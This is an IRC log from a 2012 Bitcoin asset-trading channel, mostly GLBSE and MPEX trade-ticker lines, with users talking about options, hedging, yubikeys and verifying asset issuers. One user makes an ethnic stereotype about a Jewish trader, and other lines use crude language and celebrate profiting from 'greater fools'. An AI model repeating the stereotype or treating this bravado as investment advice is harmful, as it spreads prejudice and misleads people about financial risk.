5.1479 BTC [-] Aug 16 14:25:42 [MPEX] [S.MPOE] 113 @ 0.00033437 = 0.0378 BTC [-] Aug 16 14:25:44 [MPEX] [S.MPOE] 27700 @ 0.0003284 = 9.0967 BTC [-] Aug 16 14:27:33 DeaDTerra what are you hedging ? Aug 16 14:28:44 [GLBSE] [OBSI.HRPT] 89 @ 0.1010023 = 8.9892 BTC [-] Aug 16 14:28:46 [GLBSE] [OBSI.HRPT] 18 @ 0.101001 = 1.818 BTC [-] Aug 16 14:28:47 [GLBSE] [OBSI.HRPT] 91 @ 0.101 = 9.191 BTC [-] Aug 16 14:29:59 [MPEX] [F.GIGA.ETF] 9909 @ 0.00109698 = 10.87 BTC [-] Aug 16 14:30:24 farfi : actually, there's mpoe shares, mpoe bonds, there's the new cdo Aug 16 14:30:38 there's btc/usd options, there's the hash options, there's tons of stuff. Aug 16 14:31:00 [GLBSE] [ASICMINER] 20 @ 0.105 = 2.1 BTC [+] Aug 16 14:31:07 DeaDTerra try mpoe.etf, the only glbse asset going up. Aug 16 14:32:54 dont forget S.BVPS Aug 16 14:33:01 paid out 55.5 BTC in divs last month! Aug 16 14:33:21 [GLBSE] [ASIC.COOP] 10 @ 0.4 = 4 BTC [-] Aug 16 14:33:23 ;;ticker Aug 16 14:33:23 Best bid: 13.28999, Best ask: 13.29, Bid-ask spread: 0.00001, Last trade: 13.29, 24 hour volume: 113814, 24 hour low: 12.39995, 24 hour high: 13.84119 Aug 16 14:33:28 ;;calc 55.5 * 13.28 Aug 16 14:33:28 737.04 Aug 16 14:33:33 just sayin ;) Aug 16 14:34:02 mircea_popescu: mpoe stuff? you mean on MPEX? Aug 16 14:34:12 yes. Aug 16 14:34:42 well there's a share-holding etf on glbse Aug 16 14:34:43 hehe no way.... I was blinded last time I looked at the site... Aug 16 14:34:51 [MPEX] [S.BVPS] 339 @ 0.0037991 = 1.2879 BTC [+] Aug 16 14:34:58 if you're in this for aesthetic reasons you should prolly try porn sites. Aug 16 14:35:11 which mircea_popescu can also help you with Aug 16 14:35:22 :) Aug 16 14:35:32 along with spam|scam|devilworship|luke-jr stuff Aug 16 14:35:32 im just sick of pretty css + unhashed md5 passwords, and people STILL go for it. Aug 16 14:35:50 according to ciucui anyway Aug 16 14:36:07 i don't worship the devil Aug 16 14:36:11 the devil worships me. Aug 16 14:36:42 [GLBSE] [ASICMINER] 10 @ 0.105 = 1.05 BTC [+] Aug 16 14:36:43 [MPEX] [O.HASH.P10TH] 150000 @ 0.02747022 = 4120.533 BTC [-] Aug 16 14:37:03 i wonder if this new customer i got Aug 16 14:37:10 would be interested in opening an asset Aug 16 14:37:13 theyre a very big site Aug 16 14:37:18 most of their customers were USD tho Aug 16 14:37:20 paypal fucked em Aug 16 14:37:38 so ask em. Aug 16 14:37:50 [GLBSE] [ASICMINER] 1 @ 0.105 BTC [+] Aug 16 14:38:02 whoa 20k sale on mtgox and the price held. Aug 16 14:38:05 we're going to 15. Aug 16 14:38:58 $18k to $14 Aug 16 14:42:11 At $15 if I cash out Aug 16 14:42:16 I tripled my money Aug 16 14:42:19 Hmm! Aug 16 14:42:20 [GLBSE] [BDT] 3 @ 1.0001 = 3.0003 BTC [+] Aug 16 14:42:21 [GLBSE] [BDT] 4 @ 1 = 4 BTC [-] Aug 16 14:42:41 [MPEX] [B.MPCD.C] 50000 @ 0.001 = 50 BTC Aug 16 14:42:47 mircea do you have a yubikey? Aug 16 14:42:52 my system is getting better now Aug 16 14:42:58 nope. Aug 16 14:43:43 We will be giving free yubikeys to our users. Aug 16 14:44:14 Mircea, I am hedging against the increase of Bitcoin price ofc Aug 16 14:45:40 then buy options neh ? Aug 16 14:46:04 usagi, what masterpiece do you have now that requires yubikeys? Aug 16 14:46:16 I showed it to you Aug 16 14:46:22 [GLBSE] [BDK.BND] 5 @ 0.1005 = 0.5025 BTC [-] Aug 16 14:46:24 [GLBSE] [BDK.BND] 2 @ 0.1 = 0.2 BTC [-] Aug 16 14:46:25 [GLBSE] [BDK.BND] 18 @ 0.1 = 1.8 BTC [-] Aug 16 14:46:28 Ah, well, I'm still perplexed. Aug 16 14:46:34 You told me SECRET Aug 16 14:46:41 I'm working on a non-yubikey + password and/or google auth login Aug 16 14:46:43 yubikeys are pretty much application independent neh ? Aug 16 14:46:49 then it will be open to the public Aug 16 14:46:53 where and how can I but these options? Aug 16 14:47:05 I have been buying futures on icbit.se but it's very low volume :( Aug 16 14:47:45 Things will make sense in good time I suppose Aug 16 14:47:56 DeaDTerra --> http://polimedia.us/bitcoin/mpex.php Aug 16 14:48:00 its very high volume. Aug 16 14:48:22 I need some data for yubikeys which is not publicly available right now Aug 16 14:48:28 it is the last missing link in my software Aug 16 14:48:31 Once I get it... boom Aug 16 14:48:34 After Meni Rosenfield force buybacks my POLY.10.1 I'll be on MPEX Aug 16 14:48:49 what's poly10.1 ? Aug 16 14:49:05 Basically you use it to long bitcoins. Aug 16 14:49:14 I've already doubled some of my Bitcoins on it. Aug 16 14:49:25 aha Aug 16 14:49:29 [MPEX] [S.BVPS] 350 @ 0.00381824 = 1.3364 BTC [+] Aug 16 14:49:30 [MPEX] [S.BVPS] 531 @ 0.00382842 = 2.0329 BTC [+] Aug 16 14:49:40 All I can say is that Meni Rosenfield has a lot of money. Aug 16 14:50:03 ...and call me racist but he's a Jewish financial wizard. Aug 16 14:50:11 i imagined it was a girl. Aug 16 14:50:36 Nah. He's just an Israeli with a weird name. Aug 16 14:51:25 he pissed me off once by reusing some asset contract and pretending he came up with it or something Aug 16 14:51:28 i dun recall. Aug 16 14:51:49 That's why I love the man. Aug 16 14:52:05 lol Aug 16 14:52:12 [GLBSE] [BDT] 3 @ 0.96000013 = 2.88 BTC [-] Aug 16 14:52:37 [GLBSE] [YARR] 1 @ 1.43 BTC [-] Aug 16 14:52:37 [GLBSE] [YARR] 4 @ 1.44 = 5.76 BTC [+] Aug 16 14:52:39 [GLBSE] [YARR] 5 @ 1.45 = 7.25 BTC [+] Aug 16 14:52:40 so annoying that you can't short glbse assets. Aug 16 14:53:43 The problem is to short something, someone else has to loan you shares. Aug 16 14:54:11 that's why you have marketmakers. Aug 16 14:54:27 Exactly. Aug 16 14:55:27 [GLBSE] [BDT] 2 @ 0.9999 = 1.9998 BTC [+] Aug 16 14:55:33 I might buy some options, though I need to read up on how your system works firs Aug 16 14:55:35 first* Aug 16 14:55:44 [MPEX] [O.HASH.C10TH] 150000 @ 0.0000998 = 14.97 BTC [-] Aug 16 14:55:49 ask away. Aug 16 14:56:14 [GLBSE] [YARR] 50 @ 1.45 = 72.5 BTC [+] Aug 16 14:56:55 there are tons of different options what's the difference betwhen them? Aug 16 14:57:17 [MPEX] [O.BTCUSD.P040T] 21 @ 0.02939266 = 0.6172 BTC [+] Aug 16 14:57:18 [MPEX] [O.BTCUSD.P040T] 22 @ 0.02660151 = 0.5852 BTC [-] Aug 16 14:57:19 strike price mostly Aug 16 14:57:30 also T are for this month and N for next Aug 16 14:57:47 so it's month to month based? Aug 16 14:58:22 yes, all options expire on the last friday of a given month Aug 16 14:58:31 you ever used options before ? Aug 16 14:58:46 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9871 = 3.9484 BTC [-] Aug 16 14:58:51 No, I have used futures and levarage/margin trading only Aug 16 14:59:07 a ok. lemme fish a link for you. Aug 16 14:59:16 [MPEX] [S.MPOE] 4449 @ 0.00032653 = 1.4527 BTC [-] Aug 16 14:59:49 [GLBSE] [YABMC] 7 @ 0.118 = 0.826 BTC [+] Aug 16 15:00:29 oki thanks :) Aug 16 15:02:03 I think we are going to hit 15 today Aug 16 15:03:06 why can't this bubble pop ;( Aug 16 15:03:46 DeaDTerra https://bitcointalk.org/index.php?topic=67302.0 Aug 16 15:03:52 [MPEX] [S.BVPS] 397 @ 0.00382842 = 1.5199 BTC [+] Aug 16 15:04:10 thank you Aug 16 15:04:17 hmmm Aug 16 15:04:24 In June, 2012, a team of computer scientists claimed to have developed a method of quickly extracting the secret key generated by several RSA dongles including the SecurID 800. Calling themselves "Team Prosecco," the group published a research paper documenting their findings which they plan to present at a cryptography conference in August, 2012. Aug 16 15:04:31 i wonder if this be the end of dongles like yubikei. Aug 16 15:04:44 http://bits.blogs.nytimes.com/2012/06/25/computer-scientists-break-security-token-key-in-record-time/ Aug 16 15:04:54 that's misleading Aug 16 15:05:04 i believe that's the research that depended on a compromised system Aug 16 15:05:05 to get in Aug 16 15:05:14 if a system was already compromised, rsa isnt going to do much Aug 16 15:05:21 DeaDTerra: I made over 100 Bitcoins betting over 1000 Bitcoins it wouldn't pop below $10. ; ) Aug 16 15:05:32 Worst bet ever but I won. Aug 16 15:05:45 s/worst/most dangerous/ Aug 16 15:06:08 nope rg, that'd be a diff thing Aug 16 15:09:17 [GLBSE] [TYGRR.BOND-P] 10 @ 0.987 = 9.87 BTC [-] Aug 16 15:09:19 [GLBSE] [TYGRR.BOND-P] 6 @ 0.98521 = 5.9113 BTC [-] Aug 16 15:09:20 [GLBSE] [TYGRR.BOND-P] 3 @ 0.98511 = 2.9553 BTC [-] Aug 16 15:09:20 okay so what do I do if I want to open a long position for 100 BTc? Aug 16 15:10:11 first of I need a account on MPOE right? Aug 16 15:10:18 well if you have an account you deposit the btc and issue a buy order. Aug 16 15:10:24 if you don't have an acct you have to find a broker Aug 16 15:10:37 a buy order, for which contract/asset Aug 16 15:11:00 well, whichever you pick. if you expect the price to go up you eiother buy a long call or sell a put Aug 16 15:11:00 and is the email thing still valid or is it done over MPOE? Aug 16 15:11:27 that 1st post there is stale by now, things changed. i mostly gave you the link for the following posts, with the various hedging stratefgies Aug 16 15:11:32 since it goes into a lot of detail. Aug 16 15:11:59 okay, I will go read all of this and do some additional research and I will get back to you :) Aug 16 15:12:00 [GLBSE] [TYGRR.BOND-P] 16 @ 0.98511 = 15.7618 BTC [-] Aug 16 15:12:01 [GLBSE] [TYGRR.BOND-P] 9 @ 0.9851 = 8.8659 BTC [-] Aug 16 15:12:22 not something to be rushed into, you know. complex financial instruments. Aug 16 15:12:23 Hint: He's not interested. Aug 16 15:12:25 [GLBSE] [TYGRR.BOND-P] 16 @ 0.9851 = 15.7616 BTC [-] Aug 16 15:12:37 lol why teh hate Aug 16 15:13:02 [GLBSE] [TYGRR.BOND-P] 5 @ 0.985 = 4.925 BTC [-] Aug 16 15:13:04 [GLBSE] [TYGRR.BOND-P] 1 @ 0.982 BTC [-] Aug 16 15:13:07 I am interested Aug 16 15:13:26 I just feel like this is something I should research as I need to know what I am getting into Aug 16 15:13:33 you should research it. Aug 16 15:13:43 and you should also test your understanding with small trades first. Aug 16 15:13:49 [GLBSE] [TYGRR.BOND-P] 20 @ 0.98 = 19.6 BTC [-] Aug 16 15:13:57 and it seems quite complex, but it's probably something I will end up investing in as I need to be able to long, as the increase in price is having a huge effect on GBF Aug 16 15:14:02 don't run in there and get raped. Aug 16 15:14:53 [GLBSE] [PPT.E] 10 @ 1.25 = 12.5 BTC [+] Aug 16 15:15:13 http://www.oftwominds.com/blogapril12/when-money-vanishes4-12.html kinda good read. Aug 16 15:15:29 [GLBSE] [PPT.E] 10 @ 1.25 = 12.5 BTC [+] Aug 16 15:17:21 [MPEX] [F.GIGA.ETF] 4991 @ 0.00109698 = 5.475 BTC [-] Aug 16 15:19:07 [GLBSE] [TYGRR.BOND-P] 3 @ 0.971 = 2.913 BTC [-] Aug 16 15:19:59 [GLBSE] [MPOE.ETF] 6 @ 1.4 = 8.4 BTC [-] Aug 16 15:20:42 [GLBSE] [GIGAMINING] 4 @ 1.04 = 4.16 BTC [-] Aug 16 15:20:44 [GLBSE] [GIGAMINING] 6 @ 1.026 = 6.156 BTC [-] Aug 16 15:21:07 [GLBSE] [MPOE.ETF] 1 @ 1.4 BTC [-] Aug 16 15:22:10 [GLBSE] [TYGRR.BOND-P] 5 @ 0.98 = 4.9 BTC [+] Aug 16 15:22:45 [MPEX] [O.BTCUSD.P070N] 10 @ 0.05061451 = 0.5061 BTC [-] Aug 16 15:22:53 [GLBSE] [TYGRR.BOND-PI] 3 @ 1.10000001 = 3.3 BTC [-] Aug 16 15:33:24 [GLBSE] [COGNITIVE] 8 @ 0.6309 = 5.0472 BTC [-] Aug 16 15:33:43 [GLBSE] [BDK.BND] 25 @ 0.1 = 2.5 BTC [-] Aug 16 15:34:21 [GLBSE] [BDK.BND] 5 @ 0.1 = 0.5 BTC [-] Aug 16 15:34:22 [GLBSE] [BDK.BND] 5 @ 0.099 = 0.495 BTC [-] Aug 16 15:35:44 [GLBSE] [BTCMC] 1 @ 0.6501 BTC [-] Aug 16 15:36:54 [GLBSE] [BTCMC] 4 @ 0.65001 = 2.6 BTC [-] Aug 16 15:37:31 [GLBSE] [BTCMC] 7 @ 0.65 = 4.55 BTC [-] Aug 16 15:37:33 [GLBSE] [BTCMC] 1 @ 0.65 BTC [-] Aug 16 15:38:49 [GLBSE] [BTCMC] 4 @ 0.6501 = 2.6004 BTC [+] Aug 16 15:39:29 [MPEX] [O.BTCUSD.C010T] 10 @ 0.92608283 = 9.2608 BTC [-] Aug 16 15:41:27 [MPEX] [O.BTCUSD.C020T] 1 @ 0.8659938 BTC [-] Aug 16 15:41:28 [MPEX] [O.BTCUSD.C020T] 1 @ 0.85628426 BTC [-] Aug 16 15:41:30 [MPEX] [O.BTCUSD.C020T] 37 @ 0.84916565 = 31.4191 BTC [-] Aug 16 15:42:35 [MPEX] [O.BTCUSD.P040T] 14 @ 0.02660151 = 0.3724 BTC [-] Aug 16 15:42:36 [MPEX] [O.BTCUSD.P040T] 36 @ 0.02454581 = 0.8836 BTC [-] Aug 16 15:42:38 [MPEX] [O.BTCUSD.P040T] 23 @ 0.01521074 = 0.3498 BTC [-] Aug 16 15:42:52 [MPEX] [O.BTCUSD.C030T] 1 @ 0.78380747 BTC [-] Aug 16 15:42:54 [MPEX] [O.BTCUSD.C030T] 56 @ 0.77224847 = 43.2459 BTC [-] Aug 16 15:43:07 [MPEX] [O.BTCUSD.C010T] 31 @ 0.92608283 = 28.7086 BTC [-] Aug 16 15:45:08 [MPEX] [O.BTCUSD.P110T] 23 @ 0.03353078 = 0.7712 BTC [-] Aug 16 15:51:52 [GLBSE] [BDT] 3 @ 0.96010013 = 2.8803 BTC [-] Aug 16 15:51:54 [GLBSE] [BDT] 6 @ 0.96000013 = 5.76 BTC [-] Aug 16 15:56:39 [GLBSE] [BDT] 3 @ 0.96000013 = 2.88 BTC [-] Aug 16 15:57:54 i see bdt is doing well. Aug 16 15:58:02 anyone interview kludge yet ? Aug 16 16:01:26 [GLBSE] [HYDRO.BONDS] 1 @ 1.459 BTC [-] Aug 16 16:02:52 It's due to the security concerns :8 Aug 16 16:03:09 well yea. Aug 16 16:06:04 i told i told you guys to buy s.bvps... Aug 16 16:06:07 thought* Aug 16 16:06:39 moar! Aug 16 16:08:01 [GLBSE] [BDT] 80 @ 0.98 = 78.4 BTC [+] Aug 16 16:11:00 lol Aug 16 16:11:04 people will give their money to anything Aug 16 16:11:13 [GLBSE] [YABMC] 15 @ 0.1151 = 1.7265 BTC [-] Aug 16 16:11:14 [GLBSE] [YABMC] 4 @ 0.115 = 0.46 BTC [-] Aug 16 16:13:29 https://bitcointalk.org/index.php?topic=101044.0 Aug 16 16:13:32 everyone please read this Aug 16 16:13:34 and comment Aug 16 16:13:38 I feel this is important. Aug 16 16:15:01 lets just seee Aug 16 16:18:36 i dunno usagi Aug 16 16:19:56 do you think its fair to scrutinize other people like that .. i mean.. the #2 highest volume asset on glbse has NOTHING verified Aug 16 16:20:21 you think its fair to demand something of another asset when so many dont ask it from the #2 top highest volume Aug 16 16:20:31 or do you think the people who are perpetrating this scam are seeing that Aug 16 16:20:36 and wanting to exploit it Aug 16 16:20:37 personally Aug 16 16:20:39 i agree with you Aug 16 16:20:40 fuck em Aug 16 16:20:46 they should ALL provide ID Aug 16 16:20:50 imo Aug 16 16:21:05 at least photo ID/ Email Aug 16 16:22:20 but Aug 16 16:22:22 if i were a scammer Aug 16 16:22:24 and i were them Aug 16 16:22:27 id argue that point Aug 16 16:22:29 why them? Aug 16 16:22:40 It's a new asset Aug 16 16:22:46 Yes it's a new asset Aug 16 16:22:52 And "from this day forth" I believe, I really do believe Aug 16 16:22:56 we need higher standards. Aug 16 16:23:01 [GLBSE] [BITBOND] 2 @ 0.3903 = 0.7806 BTC [+] Aug 16 16:23:02 talk to nefario Aug 16 16:23:08 he should put a vote to the users Aug 16 16:23:11 I said my peace Aug 16 16:23:19 already :) Aug 16 16:23:24 nefario knows what I want. Aug 16 16:23:33 usagi has already talked to me about this asset Aug 16 16:23:36 we could probably force him Aug 16 16:23:40 I told him to voice his converns on the forums Aug 16 16:23:42 nefario: we could probably force yuo Aug 16 16:26:46 i just voiced mine Aug 16 16:26:48 on that thread Aug 16 16:27:35 rg's idea is excellent Aug 16 16:27:37 Tiers! Aug 16 16:27:42 =) Aug 16 16:27:45 yep Aug 16 16:27:53 Well, that ties in with tiered accounts which I mentioned to you already Nefario Aug 16 16:28:03 [MPEX] [S.MPOE] 21600 @ 0.00033366 = 7.2071 BTC [+] Aug 16 16:28:08 well Aug 16 16:28:11 now that its out there Aug 16 16:28:14 people can either agree or disagree Aug 16 16:28:16 and we can go from there Aug 16 16:28:26 if people want a change, it should change Aug 16 16:29:14 more safety for glbse users == more money in glbse == more trading == more fees == nefario becomes Nefario Dotcom and buys mansion in NZ Aug 16 16:30:31 [MPEX] [F.GIGA.ETF] 2700 @ 0.00108128 = 2.9195 BTC [-] Aug 16 16:30:36 Lol Nefario Dotcom Aug 16 16:30:47 lol Aug 16 16:30:48 tell us nefario Aug 16 16:30:55 do you own any nefario.tld type domains Aug 16 16:31:01 i bet he does Aug 16 16:32:14 nefar.io Aug 16 16:32:19 [MPEX] [S.MPOE] 10751 @ 0.00033014 = 3.5493 BTC [-] Aug 16 16:32:20 [MPEX] [S.MPOE] 2649 @ 0.00032439 = 0.8593 BTC [-] Aug 16 16:33:54 Domain "NEFAR.IO" - Available Aug 16 16:33:54 To purchase please go to http://www.nic.io/ Aug 16 16:34:53 [GLBSE] [GIGAMINING] 1 @ 1.026 BTC [-] Aug 16 16:35:50 MPEX should have a GLBSE assetr Aug 16 16:35:58 so each exchange has the others asset Aug 16 16:38:03 and also Aug 16 16:38:14 glbse needs a lil textbox at the top of the markets page Aug 16 16:38:19 where you can start typing an asset Aug 16 16:38:29 and it pops up and has a check box next to it Aug 16 16:38:32 so you select one Aug 16 16:38:35 start typuing another Aug 16 16:38:39 until you have all the assets you want to vew Aug 16 16:38:45 and then it displays them all on the same page Aug 16 16:38:50 [MPEX] [S.BVPS] 200 @ 0.00379232 = 0.7585 BTC [-] Aug 16 16:38:51 and you can save your vies Aug 16 16:38:53 views* Aug 16 16:39:00 to manage different groups of assets Aug 16 16:39:02 on different pages Aug 16 16:39:10 like one page is shitty loser miner bonds Aug 16 16:39:17 the next page is legit sweet IPOs like bitvps Aug 16 16:39:22 [MPEX] [F.GIGA.ETF] 6909 @ 0.00108128 = 7.4706 BTC [-] Aug 16 16:39:49 and then the next page is when we integrate MPEX with GLBSE so you can do options Aug 16 16:40:13 so if you could get on that Aug 16 16:40:15 that'd be great Aug 16 16:46:07 [GLBSE] [TYGRR.BOND-P] 8 @ 0.9999 = 7.9992 BTC [+] Aug 16 16:46:08 [GLBSE] [TYGRR.BOND-P] 11 @ 1 = 11 BTC [+] Aug 16 16:46:09 [GLBSE] [TYGRR.BOND-P] 9 @ 1 = 9 BTC [+] Aug 16 16:46:10 [GLBSE] [TYGRR.BOND-P] 20 @ 1.005 = 20.1 BTC [+] Aug 16 16:46:12 [GLBSE] [TYGRR.BOND-P] 30 @ 1.0058 = 30.174 BTC [+] Aug 16 16:48:51 [GLBSE] [YABIF] 2 @ 1 = 2 BTC [-] Aug 16 16:49:14 [MPEX] [S.MPOE] 7100 @ 0.00033366 = 2.369 BTC [+] Aug 16 16:51:39 [GLBSE] [OBSI.HRPT] 17 @ 0.10435 = 1.774 BTC [+] Aug 16 17:00:58 [GLBSE] [FPGAMINING] 3 @ 0.9399 = 2.8197 BTC [+] Aug 16 17:08:11 [GLBSE] [CBGB] 1 @ 0.49999999 BTC [+] Aug 16 17:08:25 [MPEX] [S.MPOE] 21200 @ 0.00032711 = 6.9347 BTC [-] Aug 16 17:12:25 < DeaDTerra> first of I need a account on MPOE right? <<< or a broker Aug 16 17:14:20 [GLBSE] [ASICMINER] 1 @ 0.1031 BTC [-] Aug 16 17:15:36 [MPEX] [F.GIGA.ETF] 4768 @ 0.00109882 = 5.2392 BTC [+] Aug 16 17:16:28 [GLBSE] [RSM] 2 @ 0.26 = 0.52 BTC [-] Aug 16 17:16:50 [GLBSE] [GIGAMINING] 2 @ 1.02701 = 2.054 BTC [+] Aug 16 17:16:51 [GLBSE] [GIGAMINING] 6 @ 1.027 = 6.162 BTC [-] Aug 16 17:16:52 [GLBSE] [GIGAMINING] 37 @ 1.026 = 37.962 BTC [-] Aug 16 17:16:55 [GLBSE] [RSM] 1 @ 0.255 BTC [-] Aug 16 17:17:54 [GLBSE] [PUREMINING] 15 @ 0.1407 = 2.1105 BTC [-] Aug 16 17:17:56 [GLBSE] [PUREMINING] 23 @ 0.1406 = 3.2338 BTC [-] Aug 16 17:18:11 [GLBSE] [NASTY] 8 @ 0.4999 = 3.9992 BTC [+] Aug 16 17:18:13 [GLBSE] [NASTY] 55 @ 0.5 = 27.5 BTC [+] Aug 16 17:18:13 [GLBSE] [NASTY] 27 @ 0.51 = 13.77 BTC [+] Aug 16 17:19:25 [GLBSE] [GMVT-BOT] 15 @ 0.0999 = 1.4985 BTC [-] Aug 16 17:23:03 [GLBSE] [GIGAMINING] 1 @ 1.025 BTC [-] Aug 16 17:23:44 [GLBSE] [NASTY] 11 @ 0.51 = 5.61 BTC [+] Aug 16 17:24:11 [GLBSE] [BTC-MINING] 1 @ 0.8612 BTC [+] Aug 16 17:26:01 [GLBSE] [NASTY] 1 @ 0.51 BTC [+] Aug 16 17:26:51 [GLBSE] [NASTY] 1 @ 0.51 BTC [+] Aug 16 17:29:17 [GLBSE] [PUREMINING] 1 @ 0.14050001 BTC [-] Aug 16 17:29:36 [MPEX] [F.GIGA.ETF] 5332 @ 0.00111255 = 5.9321 BTC [+] Aug 16 17:29:37 [MPEX] [F.GIGA.ETF] 4244 @ 0.0010947 = 4.6459 BTC [-] Aug 16 17:29:39 [MPEX] [F.GIGA.ETF] 4460 @ 0.00106247 = 4.7386 BTC [-] Aug 16 17:30:39 [MPEX] [O.BTCUSD.P120N] 2 @ 0.2153441 = 0.4307 BTC [-] Aug 16 17:30:42 [GLBSE] [COGNITIVE] 1 @ 0.6309 BTC [-] Aug 16 17:32:30 [MPEX] [S.MPOE] 38800 @ 0.00033366 = 12.946 BTC [+] Aug 16 17:32:44 [GLBSE] [TYGRR.BOND-P] 4 @ 0.98270001 = 3.9308 BTC [-] Aug 16 17:33:32 [GLBSE] [MOORE] 3 @ 0.51408 = 1.5422 BTC [+] Aug 16 17:35:38 [GLBSE] [MOORE] 4 @ 0.51418 = 2.0567 BTC [+] Aug 16 17:36:52 [GLBSE] [NYAN.C] 1 @ 1.069 BTC [+] Aug 16 17:38:03 [GLBSE] [BITCOINMINV] 20 @ 0.122 = 2.44 BTC [+] Aug 16 17:38:26 [GLBSE] [GIPPT] 2 @ 1.1 = 2.2 BTC [+] Aug 16 17:38:55 [GLBSE] [DMC] 3 @ 0.07 = 0.21 BTC [-] Aug 16 17:40:50 [GLBSE] [GIPPT] 1 @ 1.1 BTC [+] Aug 16 17:41:41 [MPEX] [S.MPOE] 46400 @ 0.00034102 = 15.8233 BTC [+] Aug 16 17:41:50 [MPEX] [O.BTCUSD.P110T] 10 @ 0.05026751 = 0.5027 BTC [+] Aug 16 17:42:44 DMC now at .07 Aug 16 17:43:01 was 0.2 Aug 16 17:43:08 0.02 :) Aug 16 17:43:17 ah Aug 16 17:43:19 a rally Aug 16 17:43:21 ;) Aug 16 17:43:47 .07 oh lol Aug 16 17:43:48 can make some nice money even on those Aug 16 17:43:53 it almost doubled!!! :) Aug 16 17:44:08 [GLBSE] [BFLS] 1 @ 1.1 BTC [-] Aug 16 17:44:09 bought at 0.03 sold at 0.05 was happy! Aug 16 17:44:21 all in a few hours Aug 16 17:44:29 [GLBSE] [BDT] 20 @ 0.95 = 19 BTC [-] Aug 16 17:44:30 lol, good job Aug 16 17:44:41 sorry for the suckers who bought at .05 though, lol Aug 16 17:45:21 somebody said the same to me when i bought @ 0.03 :) Aug 16 17:46:02 [GLBSE] [BITCOINMINV] 1 @ 0.122 BTC [+] Aug 16 17:46:09 :) Aug 16 17:46:16 great fools! :) Aug 16 17:46:21 greater* Aug 16 17:46:55 [GLBSE] [OBSI.1MHS] 3 @ 0.07799999 = 0.234 BTC [+] Aug 16 17:47:10 they are good to find:) Aug 16 17:49:02 [GLBSE] [FPGAMINING] 1 @ 0.9399 BTC [+] Aug 16 17:50:11 [GLBSE] [GIGAMINING] 1 @ 1.025 BTC [-] Aug 16 17:50:12 [GLBSE] [GIGAMINING] 1 @ 1.02000001 BTC [-] Aug 16 17:50:14 [GLBSE] [GIGAMINING] 2 @ 1.02 = 2.04 BTC [-] Aug 16 17:50:15 [GLBSE] [GIGAMINING] 3 @ 1 = 3 BTC [-] Aug 16 17:50:42 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9999 = 3.9996 BTC [+] Aug 16 17:50:44 [GLBSE] [TYGRR.BOND-P] 3 @ 1 = 3 BTC [+] Aug 16 17:52:05 [MPEX] [S.MPOE] 16200 @ 0.00034102 = 5.5245 BTC [+] Aug 16 17:58:34 [GLBSE] [MOORE] 2 @ 0.51408 = 1.0282 BTC [-] Aug 16 17:59:35 [MPEX] [S.MPOE] 3211 @ 0.00034205 = 1.0983 BTC [+] Aug 16 17:59:37 [MPEX] [S.MPOE] 45189 @ 0.00034216 = 15.4619 BTC [+] Aug 16 18:00:03 [GLBSE] [BDT] 20 @ 0.95 = 19 BTC [-] Aug 16 18:00:57 [GLBSE] [OBSI.1MHS] 1 @ 0.074 BTC [-] Aug 16 18:01:02 [MPEX] [O.BTCUSD.C080T] 2 @ 0.39001013 = 0.78 BTC [+] Aug 16 18:02:57 [GLBSE] [FPGA.CONTRACT] 3 @ 0.1389 = 0.4167 BTC [-] Aug 16 18:04:27 [GLBSE] [BDT] 10 @ 0.95 = 9.5 BTC [-] Aug 16 18:04:34 i still haven't fully grasped what the story with dmc is Aug 16 18:04:39 [GLBSE] [TYGRR.BOND-B] 6 @ 0.1 = 0.6 BTC [-] Aug 16 18:05:23 [GLBSE] [FZB.A] 10 @ 0.03 = 0.3 BTC [-] Aug 16 18:06:14 [GLBSE] [ASIC.COOP] 10 @ 0.3 = 3 BTC [-] Aug 16 18:06:57 [GLBSE] [GIGAMINING] 2 @ 1 = 2 BTC [-] Aug 16 18:11:12 [GLBSE] [PAJKA.BOND] 33 @ 0.02 = 0.66 BTC [-] Aug 16 18:11:24 its a secret apparentl Aug 16 18:11:31 yeah. Aug 16 18:12:54 [GLBSE] [TYGRR.BOND-P] 2 @ 0.9999 = 1.9998 BTC [-] Aug 16 18:14:06 [GLBSE] [YABMC] 15 @ 0.1179 = 1.7685 BTC [+] Aug 16 18:16:25 [GLBSE] [PGM] 4 @ 0.00011 = 0.0004 BTC [-] Aug 16 18:16:52 [GLBSE] [TYGRR.BOND-P] 1 @ 0.9999 BTC [-] Aug 16 18:18:16 [GLBSE] [MERGEDMINING] 5 @ 0.08 = 0.4 BTC [+] Aug 16 18:18:19 [MPEX] [S.MPOE] 21430 @ 0.00034216 = 7.3325 BTC [+] Aug 16 18:18:20 [MPEX] [S.MPOE] 20670 @ 0.00034243 = 7.078 BTC [+] Aug 16 18:24:08 [GLBSE] [FPGAMINING] 1 @ 0.93 BTC [-] Aug 16 18:25:01 [GLBSE] [SS] 1 @ 1.72 BTC [+] Aug 16 18:32:05 [GLBSE] [TEEK.B] 1 @ 1.118 BTC [+] Aug 16 18:32:06 [GLBSE] [TEEK.B] 2 @ 1.119 = 2.238 BTC [+] Aug 16 18:32:21 [GLBSE] [BITCOINMINV] 17 @ 0.118 = 2.006 BTC [-] Aug 16 18:33:53 [GLBSE] [ASICMINER] 15 @ 0.1031 = 1.5465 BTC [-] Aug 16 18:33:55 [GLBSE] [ASICMINER] 20 @ 0.103 = 2.06 BTC [-] Aug 16 18:33:56 [GLBSE] [ASICMINER] 1 @ 0.1025 BTC [-] Aug 16 18:33:57 [GLBSE] [ASICMINER] 1 @ 0.101 BTC [-] Aug 16 18:33:59 [GLBSE] [ASICMINER] 20 @ 0.1001 = 2.002 BTC [-] Aug 16 18:34:00 [GLBSE] [ASICMINER] 10 @ 0.1 = 1 BTC [-] Aug 16 18:35:04 [GLBSE] [GIPPT] 1 @ 1.09 BTC [-] Aug 16 18:37:38 http://www.theage.com.au/world/assange-wins-asylum-20120816-24bs4.html ahaha Aug 16 18:39:11 [GLBSE] [BDT] 1 @ 0.90000001 BTC [-] Aug 16 18:39:13 [GLBSE] [BDT] 49 @ 0.9 = 44.1 BTC [-] Aug 16 18:40:27 [MPEX] [S.MPOE] 60200 @ 0.00033919 = 20.4192 BTC [-] Aug 16 18:40:29 [MPEX] [S.MPOE] 642 @ 0.00033431 = 0.2146 BTC [-] Aug 16 18:41:29 anyone want to buy asicminer shares? ^^ I am also selling some other assets, have a look at my portfolio and see if there's anything you want :) https://docs.google.com/spreadsheet/ccc?key=0Aq6Ug2ODt-l2dC13WldWaTBWQVNYZWRwVDgtQmhzUkE#gid=0 Aug 16 18:42:08 [GLBSE] [GIGAMINING] 12 @ 0.9999 = 11.9988 BTC [-] Aug 16 18:43:26 [MPEX] [S.MPOE] 22130 